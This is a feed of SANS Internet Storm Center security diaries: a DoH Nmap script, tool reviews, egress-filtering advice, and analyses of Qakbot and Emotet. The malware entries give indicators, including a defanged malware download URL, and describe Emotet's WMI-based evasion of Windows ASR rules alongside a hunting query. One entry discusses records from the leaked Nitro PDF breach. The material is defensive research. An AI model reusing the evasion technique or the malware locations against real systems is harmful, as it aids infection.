Quantcast
Channel: SANS Internet Storm Center, InfoCON: green
Viewing all 8242 articles
Browse latest View live

ISC Stormcast For Monday, January 25th, 2021 https://isc.sans.edu/podcastdetail.html?id=7342, (Mon, Jan 25th)

$
0
0
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Fun with NMAP NSE Scripts and DOH (DNS over HTTPS), (Mon, Jan 25th)

$
0
0

DOH (DNS over HTTPS) has been implemented into the various browsers over the last year or so, and there's a fair amount of support for it on public DNS services.  Because it's encrypted and over TCP, the mantra of "because privacy" has carried the day it looks like.  But why do network and system admins hate it so?

First of all, any name resolution that goes outside the organization, especially if it's encrypted, can't be easily logged.  I get that this is the entire point, but there are several attacks that can be prevented with simple DNS monitoring and sink-holing (blocking known malicious domains), and several attacks that can be mounted using just DNS (delivering malware via DNS TXT records for instance).   

What about DNS Tunneling you ask?  DNS tunnelling over DOH seems like a bit of a silly exercise - unless you're decrypting at your perimeter, DNS tunnelling over DOH is just going to look like HTTPS - you might as well just use HTTPS.

Why do privacy advocates tend to lose this debate at work?

For starters, the expecation of 100% privacy, but then the desire to hold IT and Security folks accountable for any breach or security incident, while you've got their hands tied doesn't hold water.  Especially for decryption, most organizations have broad exceptions by category - for instance, most organizations will not decrypt or inspect banking or financial information, interaction with government sites (taxes and so on), or healthcare sites of any kind.  Believe me, we don't want your banking password any more than we want your AD password!  So out of the gate, both the written and technical policies around decryption for most organizations focus on the individual's privacy, the goal is normally to protect against malware and attacks, HR violations (adult sites for instance), and illegal activity that could put the organization in jeopardy.

Also, the phrase "epxectation of privacy" is key here.  If you are at work, you don't usually have that - you're using the organizations systems and resources, and going about the business of the organization, and you've likely signed an Acceptable Use Policy (or something that covers that same ground) to that effect.  This protects you in that it defines what monitoring the company has, and protects the company in case any of it's employees do anything illegal while at work.  Note that I am not a Lawyer, nor do I play one on TV .. but I have been involved in more than a few "illegal stuff at work" cases over the years (thankfully not as a direct participant) - this stuff is important for both the company and the individuals!

So, with all the politics done, what does a DOH request look like?  The simple approach is to use the dns-json method, as outlined below - it'll save you base64 encoding the requests.  Let's start with a raw request in curl, then refine it a bit:

json formatted data:

curl -s -H 'accept: application/dns-json' 'https://1.1.1.1/dns-query?name=www.cisco.com&type=AAAA'
{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"www.cisco.com","type":28}],"Answer":[{"name":"www.cisco.com","type":5,"TTL":3600,"data":"www.cisco.com.akadns.net."},{"name":"www.cisco.com.akadns.net","type":5,"TTL":300,"data":"wwwds.cisco.com.edgekey.net."},{"name":"wwwds.cisco.com.edgekey.net","type":5,"TTL":21600,"data":"wwwds.cisco.com.edgekey.net.globalredir.akadns.net."},{"name":"wwwds.cisco.com.edgekey.net.globalredir.akadns.net","type":5,"TTL":3600,"data":"e2867.dsca.akamaiedge.net."},{"name":"e2867.dsca.akamaiedge.net","type":28,"TTL":20,"data":"2600:1408:5c00:3bc::b33"},{"name":"e2867.dsca.akamaiedge.net","type":28,"TTL":20,"data":"2600:1408:5c00:388::b33"}]}

Looks pretty straightforward - very much like any API that you might be used to.  DOH is an HTTPS request like any other, but with a specific user-agent string and a specific path on the target server (dns-query).  This raw output is great if you're a python script, but let's fix up the formatting a bit so it's a bit more "human readable"

curl -s -H 'accept: application/dns-json' 'https://1.1.1.1/dns-query?name=www.cisco.com&type=AAAA' | jq
{
  "Status": 0,
  "TC": false,
  "RD": true,
  "RA": true,
  "AD": false,
  "CD": false,
  "Question": [
    {
      "name": "www.cisco.com",
      "type": 28
    }
  ],
  "Answer": [
    {
      "name": "www.cisco.com",
      "type": 5,
      "TTL": 3597,
      "data": "www.cisco.com.akadns.net."
    },
    {
      "name": "www.cisco.com.akadns.net",
      "type": 5,
      "TTL": 297,
      "data": "wwwds.cisco.com.edgekey.net."
    },
    {
      "name": "wwwds.cisco.com.edgekey.net",
      "type": 5,
      "TTL": 21597,
      "data": "wwwds.cisco.com.edgekey.net.globalredir.akadns.net."
    },
    {
      "name": "wwwds.cisco.com.edgekey.net.globalredir.akadns.net",
      "type": 5,
      "TTL": 3597,
      "data": "e2867.dsca.akamaiedge.net."
    },
    {
      "name": "e2867.dsca.akamaiedge.net",
      "type": 28,
      "TTL": 17,
      "data": "2600:1408:5c00:388::b33"
    },
    {
      "name": "e2867.dsca.akamaiedge.net",
      "type": 28,
      "TTL": 17,
      "data": "2600:1408:5c00:3bc::b33"
    }
  ]
}


now with just the data values parsed out:

curl -s -H 'accept: application/dns-json' 'https://1.1.1.1/dns-query?name=www.cisco.com&type=AAAA' | jq | grep data | tr -s " " | cut -d " " -f 3 | tr -d \"

www.cisco.com.akadns.net.
wwwds.cisco.com.edgekey.net.
wwwds.cisco.com.edgekey.net.globalredir.akadns.net.
e2867.dsca.akamaiedge.net.
2600:1408:5c00:3bc::b33
2600:1408:5c00:388::b33

This is all well and good for a shell script, but if you need to test more servers, what other tools can you use?  With the emphasis on script and multiple, I wrote a short NSE script for NMAP that will make arbitrary DOH requests:

First of all, the syntax is:

nmap -p433 <target> --script=dns-doh <DNS server> --script-args query=<query type>,target=<DNS lookup value>

>nmap -p 443 --script=dns-doh 1.1.1.1 --script-args query=A,target=isc.sans.edu

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-25 12:04 Eastern Standard Time

Nmap scan report for one.one.one.one (1.1.1.1)

Host is up (0.027s latency).

 

PORT    STATE SERVICE

443/tcp open  https

| dns-doh:

|   Answer:

|

|       type: 1

|       name: isc.sans.edu

|       TTL: 7

|       data: 45.60.103.34

|

|       type: 1

|       name: isc.sans.edu

|       TTL: 7

|       data: 45.60.31.34

|   AD: false

|   Status: 0

|   RA: true

|   Question:

|

|       type: 1

|       name: isc.sans.edu
|   CD: false
|   RD: true
|_  TC: false

Nmap done: 1 IP address (1 host up) scanned in 9.08 seconds

Looking at the code (comments are in-line), after all the setup and syntax checking, this is essentially a 3 line script:

local nmap = require "nmap"

local shortport = require "shortport"

local http = require "http"

local stdnse = require "stdnse"

local string = require "string"

local table = require "table"

local json = require "json"

local strbuf = require "strbuf"

 

description = [[

Performs a DOH lookup against the target site

variables: t = <target of dns query>

           q = <dns query type>

]]

---

-- @usage

-- nmap <target> --script=doh <DNS server> --script-args query=<query type>,target=<DNS lookup value>

--

-- @output

-- 443/tcp open   https

-- | results of query

--

---

author = {"Rob VandenBrink","rob@coherentsecurity.com"}

license = "Creative Commons https://creativecommons.org/licenses/by-nc-sa/4.0/"

categories = { "discovery" }

portrule = shortport.http

action = function(host,port)

     -- collect the command line arguments

     local query = stdnse.get_script_args('query')

     local target = stdnse.get_script_args('target')

     -- input checking - check that both arg values are present and non-zero

     if(query==nil or query == '') then

         return "DNS query operation is not defined (A,AAAA,MX,PTR,TXT etc)"

     end

     if(target==nil or target=='') then

         return "DNS target is not defined (host, domain, IP address etc)"

     end

     -- construct the query string, the path in the DOH HTTPS GET

     local qstring = '/dns-query?name='..target..'&type='..query

     -- define the header value (which defines the output type)

     local options = {header={}}

     options['header']['accept'] = 'application/dns-json'

     -- Get some DOH answers!

     local response = http.get(host.ip, port.number, qstring, options)

     -- convert results to JSON for more legible output

     local stat, resp =json.parse(response.body)

     return resp

end

 

The dns-doh.nse script is available and is maintained at: https://github.com/robvandenbrink/dns-doh.nse

If you find any issues with this code, by all means use our comment section to report them, or ping me via git

===============
Rob VandenBrink
rob@coherentsecurity.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC Stormcast For Tuesday, January 26th, 2021 https://isc.sans.edu/podcastdetail.html?id=7344, (Tue, Jan 26th)

$
0
0
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TA551 (Shathak) Word docs push Qakbot (Qbot), (Tue, Jan 26th)

$
0
0

Introduction

Late last week, we saw new samples of Word documents from TA551 (Shathak) pushing malware.  This actor was active up through 2020-12-18 pushing IcedID malware before going on break for the holidays.  Now that it's returned, TA551 has been pushing Qakbot (Qbot) malware instead of IcedID.


Shown above: flow chart for recent TA551 (Shathak) activity so far in January 2021.

Images from the infection

See below for images associated with the infection in my lab environment.


Shown above:  Screenshot of the TA551 (Shathak) Word document with macros for Qakbot (Qbot).


Shown above:  Regsvr32 pop up message when the malware DLL to install Qakbot has successuflly run.


Shown above:  Start of TCP stream showing the HTTP request and response for the initial DLL to install Qakbot (Qbot).


Shown above:  Traffic from the infection filtered in Wireshark (part 1).


Shown above:  Traffic from the infection filtered in Wireshark (part 2).


Shown above:  Traffic from the infection filtered in Wireshark (part 3).


Shown above:  One of the emails exported from the pcap (a copy is available here).

Notes

This month, the affiliate or campaign identification string for Qakbot malware distributed through TA551 has been krk01.  When my krk01 Qakbot-infected host started spamming more Qakbot, the affiliate/campaign ID for Qakbot samples caused by this malspam was abc120.

Because of this and its previous history pushing different families of malware, I believe TA551 (Shathak) is a distributor for other criminals in our cyber threat landscape.  The other criminals push malware (like the criminals behind Qakbot), while TA551 is specifically a distribution network.

Indicators of Compromise (IOCs)

SHA256 hash: 17cd3c11fba639c1fe987a79a1b998afe741636ac607254cc134eea02c63f658

  • File size: 76,663 bytes
  • File name: particulars-01.26.21.doc
  • File description: TA551 (Shathak) Word doc with macros for Qakbot (Qbot)

SHA256 hash: 231b081480a80b05d69ed1d2e18ada8a1fd85ba6ce3e69cc8f630ede5ce5400e

  • File size: 888,832 bytes
  • File location: hxxp://5that6[.]com//assets/55ddb775/ce51025b12/9b75bbce/8a06fd47/6ac84e7424b0539286562b/xtuaq14?anz=125c5909&dlzwg=7aec167a5a2ab0&bu=a09f740
  • File location: C:\ProgramData\aZe4I.tmp
  • File description: Windows malware DLL retrieved by Word macro, used to install Qakbot (Qbot) affliate/campaign ID krk01
  • Run method:  regsvr32.exe [filename]

Final words

A pcap of the infection traffic and and malware from the infected Windows host can be found here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC Stormcast For Wednesday, January 27th, 2021 https://isc.sans.edu/podcastdetail.html?id=7346, (Wed, Jan 27th)

$
0
0
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TriOp - tool for gathering (not just) security-related data from Shodan.io (tool drop), (Wed, Jan 27th)

$
0
0

If you’re a regular reader of our Diaries, you may remember that over the last year and a half, a not insignificant portion of my posts has been devoted to discussing some of the trends in internet-connected systems. We looked at changes in the number of internet-facing machines affected by BlueKeep[1], SMBGhost[2], Shitrix[3] and several other vulnerabilities [4] as well as at the changes in TLS 1.3 support over time[5] and several other areas [6,7].  Today, we’re going to take a look at the tool, that I’ve used to gather data, on which the Diaries were based, from Shodan.io.

In keeping with the Shodan theme, I’ve called the tool TriOp. It is a Python script, which enables you to quickly build a list (or multiple lists) of Shodan search terms and then repeatedly (e.g. once every day) get the count of public IPs, which satisfy each of them, from the Shodan API.

The basic use of the tool is quite straightforward – in addition to creating a Shodan account and getting its API key, one only needs to create a list of Shodan queries one wishes to monitor over time, input this list into TriOp (as a CSV file where the first row specifies the queries or through a command line as a comma-separated list) and the tool will do the rest. It can output the results of the queries to command line, but its more useful feature is the option to save the results in a CSV, which can later be used as an input for TriOp.

 

The basic search can be done using the -s/--search option in the following way:

triop.py -s "port:80,port:443"

In such a case, the output might look like this:

TriOp 1.0
Current IP count for query port:80 is 72010982
Current IP count for query port:443 is 59072465

Where things get interesting is the output to a file using the -O/--output_file option:

triop.py -s "port:80,port:443" -O http_ports.csv

The resultant CSV file would have the following structure:

Date,2021-01-26
port:80, 72036704
port:443, 59145503

You can probably see why using the same file as input on another day might be useful. If one were to use this file as an input today using the -S/--search_file option and add the -a/--append option, TriOp would add another row to the file with today’s date.

triop.py -S http_ports.csv -a

The updated CSV file would then look like this:

Date,2021-01-26,2021-01-27
port:80,72036704,72010982
port:443,59145503,59072465

If one wanted to monitor the situation on a day to day basis, one would only need to run the same command each day (preferably using some automatic scheduling mechanism).

Although gathering data about the number of public IPs with different ports open to the internet may be interesting, as it gives us some idea about how the global network changes over time[8], we are certainly not limited to just the “ports:” filter.

Since TriOp only gets a "count" for each of the queries and not the related list of IP addresses, which satisfy the queries, one may use any combination of Shodan search filters with it (even those, which are normally accessible only to enterprise or researches-level accounts), even with a free account.

This means that one may use TriOp to monitor the changes in different open ports in specific IP ranges (filter “net:”), ASNs (filter “asn:”) or countries (filter “country:”), but also to monitor changes in the number of IPs affected by specific vulnerabilities (filter “vuln:”), systems with specific JARM[9] fingerprints (filter “ssl.jarm:”), etc.

Since we’ve mentioned vulnerabilities, if this is area that interests you, you may also use TriOp as a high-level “passive” vulnerability scanner. Shodan itself detects machines affected by some vulnerabilities – currently it seems to be able to identify about 2246 of the approximately 190k CVEs published so far, according to the results of my tests[10] – and nothing is stopping us from getting the “count” for these. List of the CVEs “supported” by Shodan, which I’ve been able to identify, are included in TriOp and one may search for them simply using any query in combination with the --vuln_search_level option:

triop.py -s "country:US" --vuln_search_level 3

The previous command would result in a very long output giving us the number of public IPs in the US, on which systems vulnerable to specific CVEs might be found:

TriOp 1.0
Checking whether Shodan detects any vulnerabilities for search country:US.
Current IP count for query country:US has_vuln:true is 10398899
Current IP count for query country:US is 160792718
Current IP count for query country:US vuln:CVE-1999-0045 is 1
...

The tool has additional features as well (adding new queries to existing search files, exporting data related to similar searches from multiple search files, etc.) and you may find some of them demonstrated in the tutorial video bellow.

The one last feature I will mention here is the ability to load multiple input files based on a specified “mask”. I’ve originally created TriOp with the intention to monitor changes in the number of vulnerable systems, ports and services both globally as well as in different countries and I’ve created over a hundred different search files by now (one per each country I was interested in as well, several for different sets of vulnerabilities, etc.). In order for me to be able to “update” each of them on a daily basis, TriOp supports the --filename_load option, which enables one to specify a string, which is then used to select files which should be used as inputs. If one were to use the following mask for example, all CSV files in the current folder would be used as inputs and consequently updated.

triop.py --filename_load .csv -a

As you may see, although TriOp is a fairly simple tool, which only gathers “counts” for each of the submitted queries, its outputs can be quite useful. This goes especially for any (national) CSIRT, which wants to monitor public IPs of its constituency, but lacks a capability to scan it on a daily basis, or for any security researcher who wants to, for example, compare the number of devices affected by specific vulnerabilities in different countries.

In any case, if you’d like to try TriOp yourself, you may download it from my GitHub page.

[1] https://isc.sans.edu/diary/25506
[2] https://isc.sans.edu/diary/26732
[3] https://isc.sans.edu/diary/26900
[4] https://isc.sans.edu/diary/26798
[5] https://isc.sans.edu/diary/26936
[6] https://isc.sans.edu/diary/25854
[7] https://isc.sans.edu/diary/26374
[8] https://untrustednetwork.net/en/2021/01/01/open-ports-statistics-for-2020/
[9] https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a
[10] https://untrustednetwork.net/en/2020/11/18/most-common-vulnerabilities-based-on-shodan/

-----------
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Emotet vs. Windows Attack Surface Reduction, (Thu, Jan 28th)

$
0
0

Emotet malware in the form of malicious Word documents continued to make the rounds over the past weeks, and the samples initially often had pretty poor anti-virus coverage (Virustotal) .The encoding used by the maldoc is very similar to what Didier Stevens analyzed in his recent diary, and the same method can be used to extract the mal-code from the current Emotet docs.

With the de-obfuscation reasonably straight forward, I proceeded to look into how the malware crooks accomplish execution from within the Word doc, and in particular, why Microsoft's "Attack Surface Reduction Rules" do not seem to help much.

But first, let's take a quick detour into what Attack Surface Reduction (ASR) promises to do on modern Windows devices. ASR is a somewhat clunky set of additional protections in Microsoft Defender Antivirus that can be turned on to log or intercept (block) some common attack scenarios. Microsoft's web site offers meager documentation, including a marginally helpful list of GUIDs that can be used to activate the feature.

One rule, "Block all Office Applications from creating child processes" (GUID D4F940AB-401B-4EFC-AADC-AD5F3C50688A) is supposed to prevent a Word document from launching any other task. Therefore, when this rule is configured, we would expect that the current Emotet and its execution chain of Word-Doc -> cmd.exe -> Powershell should not be successful. But it is.

Closer inspection of the Defender Event Log gives a hint "why": 

The only ASR rule that we see firing when the Emotet Doc is being opened is the one with ID d1e49aac-8f56-4280-b9ba-993a6d77406c, corresponding to "Block process creations originating from PSExec and WMI commands". Yes, the Emotet VBA Macro is using a WMI (windows management instrumentation) call to launch the subsequent attack code. For such WMI invocation via the Win32 Process class, the parent process of "cmd" ends up being WmiPrvSe.exe, which in turn is launched from "svchost". Therefore, "cmd" is not a child process of Word, and the ASR block rule to prevent child processes of Word consequently doesn't trigger. Bah!

In corporate environments, remote management of user devices often uses tools like SCCM or Endpoint Manager, which in turn rely on WMI to function. Therefore, setting the ASR Rule for WMI/PSExec to "block" will likely break device management, and cause a huge mess. Chances are, the Emotet crooks were fully aware of this, and that's exactly why they chose this particular execution method for their attack code.

If you have Microsoft ATP, you can also use a hunting rule like this to search for WMI process creation

DeviceEvents
| where ActionType == "ProcessCreatedUsingWmiQuery"
| project Timestamp, DeviceName, ActionType, FileName, SHA1, FolderPath, InitiatingProcessCommandLine, ProcessCommandLine
| sort by Timestamp desc

You might have to add a couple of exclusions to cover your management instrumentation or software distribution tools, but with a bit of tuning, you should see any current Emotet-like WMI attempts in your environment. The ProcessCommandLine in these cases will be long (>600chars) and contain Base64 encoded Powershell, and the InitiatingProcess is Winword.

In the meantime, the probably best bet to protect your Windows users against Emotet and similar malware remains to quarantine password protected zips or Office documents with macros on your email gateway, or to disable macros within Office outright if you can get away with it.

Maybe, in a decade or three, Microsoft will get to the point where malware introduced via Office documents really no longer is a concern and prevalent problem. Until then, I guess we have to kinda hope that today's international raid by law enforcement against the Emotet gang really got the right guys, and got them good.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC Stormcast For Thursday, January 28th, 2021 https://isc.sans.edu/podcastdetail.html?id=7348, (Thu, Jan 28th)

$
0
0
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC Stormcast For Friday, January 29th, 2021 https://isc.sans.edu/podcastdetail.html?id=7350, (Fri, Jan 29th)

$
0
0
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Sensitive Data Shared with Cloud Services, (Fri, Jan 29th)

$
0
0

Yesterday was the data protection day in Europe[1]. I was not on duty so I’m writing this quick diary a bit late. Back in 2020, the Nitro PDF service suffered from a data breach that impacted many companies around the world. This popular service allows you to create, edit and sign PDF documents. A few days ago, the database leak was released in the wild[2]:  14GB compressed, 77M credentials.

I had this opportunity to have a look at the data and it provides really interesting information. The archive contains dumps of SQL tables from a relational database. We have a file with the users' data. The classic email addresses and passwords (hopefully hashed) are present but also a user ID. A second file is the dump of a SQL table containing information about documents processed with Nitro PDF. Because it’s a relational database, we can use the user's ID to find who worked on which document(s) and when (because timestamps are also present). The information you have about documents is the title and a thumbnail reference (but not available hopefully). Example:

114193114       2013-10-28 21:46:21.765 2013-10-28 21:46:22.62  f       5430610411990818132     f       nitrocloud-prod|437b88f9-3f81-4952-9ec4-
97d8524a890e    Concept Note    \N      f       f       \N      114193118       \N

"114193114" is the user ID, "Concept Note" is the document title.

I did some correlation searches for my customers and I was able to match which user was working on a specific document at a specific time.

From a broader point of view, can we guess the type of data that was exchanged via this cloud service? I extracted all the document titles, performed some cleanup, and extracted a word list to generate this word cloud:

As you can see, many words look "juicy" and are directly related to business activities! By linking document titles with email addresses we learn about potential victims who could be interesting targets for social engineering or phishing attacks! 

Always be aware that cloud services store a lot of information that you don't really want to see out of your perimeter!

[1] https://www.coe.int/en/web/portal/28-january-data-protection-day
[2] https://www.bleepingcomputer.com/news/security/hacker-leaks-full-database-of-77-million-nitro-pdf-user-records/

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Wireshark 3.2.11 is now available which contains Bug Fixes - https://www.wireshark.org, (Sat, Jan 30th)

$
0
0

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

PacketSifter as Network Parsing and Telemetry Tool, (Sat, Jan 30th)

$
0
0

I saw PacketSifter[1], a new package on Github and figure I would give it a try to test its functionality. It is described as "PacketSifter is a tool/script that is designed to aid analysts in sifting through a packet capture (pcap) to find noteworthy traffic. Packetsifter accepts a pcap as an argument and outputs several files." It is less than a month old, initial release 31 Dec 2020 and last update 22 days ago.

What I found interesting about this tool is the fact that is uses various tshark filters to parse the information into various types of statistics (conversations & endpoints) such as IP, TCP, HTTP presenting the data in a way that can easily understood and easily search the data using various regex tools. I use Elasticsearch to collect, parse and analyze my logs but I also see PacketSifte as an alternative to quickly summarize packet data.

The result of the dns.pcap was a list of malformed DNS packets and the http.pcap was all the web traffic saved into a single file.

One of the requirements for this tool is you need to have tshark installed. My test was done with the latest version of CentOS 7.

Download the Tool from Github which also contains the VirusTotal Setup File. Ensure the system meets the following requirements:

  • Tshark[2] installed
  • VirusTotal[4] API key
  • curl (to make web requests) and jq

$ git clone https://github.com/packetsifter/packetsifterTool.git
$ cd packetsifterTool
$ chmod 555 packetsifter.sh
$ sh VTInitial.sh

Note: This file only contains web and DNS traffic

$./packetsifter.sh ../honeypot-2021-Jan-29-19-25-42.pcap

  • Would you like to resolve host names observed in pcap? This may take a long time depending on the pcap!!

<<Warning>> This can result in DNS queries for attacker infrastructure. Proceed with caution!!
(Please supply Y for yes or N for no) N

http.pcap contains all conversations containing port 80,8080,8000
Running as user "root" and group "root". This could be dangerous.

  • Would you like to export HTTP objects? The objects will be outputted to a tarball in the current directory titled: httpObjects.tar.gz

<<Warning>> There could be a lot of HTTP objects and you can potentially extract malicious http objects depending on the pcap. Use with caution!!
(Please supply Y for yes or N for no) Y

  • Would you like to lookup exported HTTP objects using VirusTotal?

**Warning** You must have ran the VTinitial.sh script to initialize PacketSifter with your VirusTotal API Key.
(Please supply Y for yes or N for no) Y

################# SMB SIFTING #################

Stats on commands ran using smb or smb2 has been generated and is available in: SMBstatistics.txt

No SMB traffic found. Deleting arbitrary SMBstatistics.txt
smb.pcap contains all conversations categorized by tshark dissectors as NBSS, SMB, or SMB2
Running as user "root" and group "root". This could be dangerous.

No SMB traffic found. Deleting arbitrary smb.pcap.

  • Would you like to export SMB objects? The objects will be outputted to a tarball in the current directory titled: smbObjects.tar.gz

<<Warning>> There could be a lot of SMB objects and you can potentially extract malicious SMB objects depending on the pcap. Use with caution!!
(Please supply Y for yes or N for no) N

################# DNS SIFTING #################

dns.pcap contains all conversations categorized by tshark dissectors as DNS
Running as user "root" and group "root". This could be dangerous.

DNS A query/responses have been outputted to dnsARecords.txt
No DNS A records found. Deleting arbitrary dnsARecords.txt

DNS TXT query/responses have been outputted to dnsTXTRecords.txt. DNS TXT records can be used for nefarious reasons and should be glanced over for any abnormalities.
No DNS TXT records found. Deleting arbitrary dnsTXTRecords.txt

################# FTP SIFTING #################
ftp.pcap contains all conversations categorized by tshark dissectors as FTP
Running as user "root" and group "root". This could be dangerous.
No FTP traffic found. Deleting arbitrary ftp.pcap

Packet sifting complete! Thanks for using the tool.

After the tool completed its analysis, a total of 7 files are generated by the script: 2 pcap and 5 text

[guy@moonbase packetsifterTool]$ ls -1 *.txt && ls -1 *.pcap

  • errors.txt
  • http_info.txt
  • IOstatistics.txt
  • IPstatistics.txt
  • TCPstatistics.txt
  • dns.pcap
  • http.pcap

The script is using tshark to provide various statistics such as:

  • HTTP/Packet Counter

  • HTTP/Requests
  • HTTP/Load Distribution

  • HTTP Responses by Server Address
  • TCP Endpoint Statistics
  • IP Endpoint Statistics

It extract all the web object into this file: httpObjects.tar.gz
$ tar zxvf httpObjects.tar.gz
$ cd httpObjects

This script is fast going through the pcap file, however, there is a warning for "Would you like to resolve host names observed in pcap?". The first time I said yes and that basically stopped the script while it was trying to resolve hostnames and eventually cancelled the script and re-ran without it.

Overall, this script is easy to use and another tool that can easily be used for analysis of pcap traffic for web, DNS and SMB objects which I didn't have in this file.

Happy hunting!

[1] https://github.com/packetsifter/packetsifterTool.git
[2] https://www.wireshark.org
[3] https://tshark.dev/setup/install/
[4] https://www.virustotal.com/gui//
[5] https://www.elastic.co

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

YARA v4.0.4, (Sun, Jan 31st)

Wireshark 3.4.3 Released, (Sun, Jan 31st)

$
0
0

Wireshark version 3.4.3 was released.

For Windows users, Npcap 1.10 replaces version 1.00.

 

It has vulnerability and bug fixes, like a USB HID dissector crash & memory leak.

 

Didier Stevens

Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

ISC Stormcast For Monday, February 1st, 2021 https://isc.sans.edu/podcastdetail.html?id=7352, (Mon, Feb 1st)

$
0
0
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Taking a Shot at Reverse Shell Attacks, CNC Phone Home and Data Exfil from Servers, (Mon, Feb 1st)

$
0
0

Over the last number of weeks (after the Solarwinds Orion news) there's been a lot of discussion on how to detect if a server-based applcation is compromised.  The discussions have ranged from buying new sophisticated tools, auditing the development pipeline, to diffing patches.  But really, for me it's as simple as saying "should my application server really be able to connect to any internet host on any protocol".  Let's take it one step further and say "should my application server really be able to connect to arbitrary hosts on tcp/443 or udp/53 (or any other protocol)".  And when you phrase it that way, the answer really should be a simple "no".

For me, fixing this should have been a simple thing.  Let's phrase this in the context of the CIS Critical Controls (https://www.cisecurity.org/controls/)
CC1: server and workstation inventory
CC2: software inventory 
(we'll add more later)

I know these first two are simple - but in your organization, do you have a list of software that's running on each of your servers?  With the inbound listening ports?  How about outbound ports that connect to known internet hosts?
This list should be fairly simple to create, figure a few minutes to hour or so for each application to phrase it all in terms that you can make firewall rules from

CC12:
Now, for each server make an egress filter "paragraph" for your internet facing firewalls.  Give it permission to reach out to it's list of known hosts and protocols.  It's rare that you will have hosts that need to reach out to the entire internet - email servers on the SMTP ports are the only ones that immediately come to mind, and we're seeing fewer and fewer of those on premise anymore these days.
Also CC12:
So now you have the list of what's allowed for that server.  Add the line "permit <servername> any ip log" - in other words, permit everything else, but log it to syslog.  Monitor that server's triggered logs for a defined period of time (a day or so is usually plenty).  Be sure to trigger any "update from the vendor" events that might be part of any installed products.  After that period of time, change that line to "deny <servername> any ip log", so now we're denying outbound packets from that server, but still logging them.

What about my Linux servers you ask?  Don't they need all of github and every everything in order to update?  No, no they do not.  To get the list of repo's that your server reaches out to for upgrades:

sudo apt-get update
Hit:1 http://us.archive.ubuntu.com/ubuntu focal InRelease
Hit:2 http://security.ubuntu.com/ubuntu focal-security InRelease
Hit:3 http://us.archive.ubuntu.com/ubuntu focal-updates InRelease
Hit:4 http://us.archive.ubuntu.com/ubuntu focal-backports InRelease
Reading package lists... Done

robv@ubuntu:~$ cat /etc/apt/sources.list | grep -v "#" | grep deb
deb http://us.archive.ubuntu.com/ubuntu/ focal main restricted
deb http://us.archive.ubuntu.com/ubuntu/ focal-updates main restricted
deb http://us.archive.ubuntu.com/ubuntu/ focal universe
deb http://us.archive.ubuntu.com/ubuntu/ focal-updates universe
deb http://us.archive.ubuntu.com/ubuntu/ focal multiverse
deb http://us.archive.ubuntu.com/ubuntu/ focal-updates multiverse
deb http://us.archive.ubuntu.com/ubuntu/ focal-backports main restricted universe multiverse
deb http://security.ubuntu.com/ubuntu focal-security main restricted
deb http://security.ubuntu.com/ubuntu focal-security universe
deb http://security.ubuntu.com/ubuntu focal-security multiverse

(this lists all sources, filters out comment lines, and looking for "deb" nicely filters out blank lines)

Refine this list further to just get the unique destinations:

robv@ubuntu:~$ cat /etc/apt/sources.list | grep -v "#" | grep deb | cut -d " " -f 2 | sort | uniq
http://security.ubuntu.com/ubuntu
http://us.archive.ubuntu.com/ubuntu/

So for a stock Ubuntu server, the answer is two - you need access to just two hosts to do a "direct from the internet" update. Your mileage may vary depending on your configuration though.

How about Windows?  For a standard application server, the answer usually is NONE.  You likely have an internal WSUS, SCCM or SCOM server right?  That takes care of updates.  Unless you are sending mail with that server (which can be limited to just tcp/25, and most firewalls will restrict to valid SMTP), likely your server is providing a service, not reaching out to anything.   Even if the server does reach out to arbitrary servers, you can likely restrict it to specific destination hosts, subnets, protocols or countries.

With a quick inventory, creating a quick "stanza" for each server's outbound permissions goes pretty quickly.  For each line, you'll be able to choose a logging action of "log", "alert" or "don't log".  Think about these choices carefully, and select the "don't log" option at your peril.  Your last line for each server's outbound stanza should almost without fail be your firewall's equivalent of "deny ip <servername> any log"

Be sure that your server change control procedures include a "after this change, does the application or server need any additional (or fewer) internet accesses?"

The fallout from this?  Surprisingly little.  

  • If you have administrators who RDP to servers, then use the browser on that server for support purposes, this will no longer work for them.  THIS IS A GOOD THING.  Browse to potentially untrusted sites from your workstation, not the servers in the server VLAN!
  • As you add or remove software, there's some firewall rule maintenance involved.  If you skip that step, then things will break when you implement them on the servers.  This "tie the firewall to the server functions" step is something we all should have been doing all along.
  • But I have servers in the cloud you say?  It's even easier to control outbound access in any of the major clouds, either with native tools or by implementing your <insert vendor here> cloud based or virtual firewall.  If you haven't been focused on firewall functions for your cloud instance, you should drop your existing projects and focus on that for a week or so (seriously, not joking).
